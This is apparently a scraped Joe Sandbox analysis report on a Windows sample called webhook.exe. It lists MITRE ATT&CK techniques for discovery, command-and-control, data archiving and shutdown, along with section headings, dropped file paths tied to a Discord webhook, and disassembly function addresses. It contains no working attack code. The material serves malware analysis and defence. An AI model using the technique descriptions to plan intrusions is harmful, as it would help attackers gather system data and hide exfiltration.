Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report webhook.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\IXP000.TMP\webhook.bat

C:\Users\user\AppData\Local\Temp\discord_webhook.json

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
webhook.exe

Function 00007FF65054721C Relevance: 52.9, APIs: 17, Strings: 13, Instructions: 372
libraryloaderCOMMON

Function 00007FF650541A08 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 181
registrylibrarymemoryCOMMON

Function 00007FF650541D28 Relevance: 37.1, APIs: 10, Strings: 11, Instructions: 373
memoryCOMMON

Function 00007FF65054521C Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 299
memorystringCOMMON

Function 00007FF650545810 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Function 00007FF650545B50 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 218
COMMON

Function 00007FF650544BE0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 124
windowCOMMON

Function 00007FF6505446E8 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 152
libraryfileloaderCOMMON

Function 00007FF650544BDE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86
windowCOMMON

Function 00007FF6505441EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 121
COMMON

Function 00007FF650547FE4 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 81
libraryloadershutdownCOMMON

Function 00007FF6505443CC Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 97
registryfileCOMMON

Function 00007FF650547010 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 114
processsynchronizationCOMMON

Function 00007FF650544FD8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 88
fileCOMMON

Function 00007FF650541150 Relevance: 12.1, APIs: 8, Instructions: 138
sleepCOMMON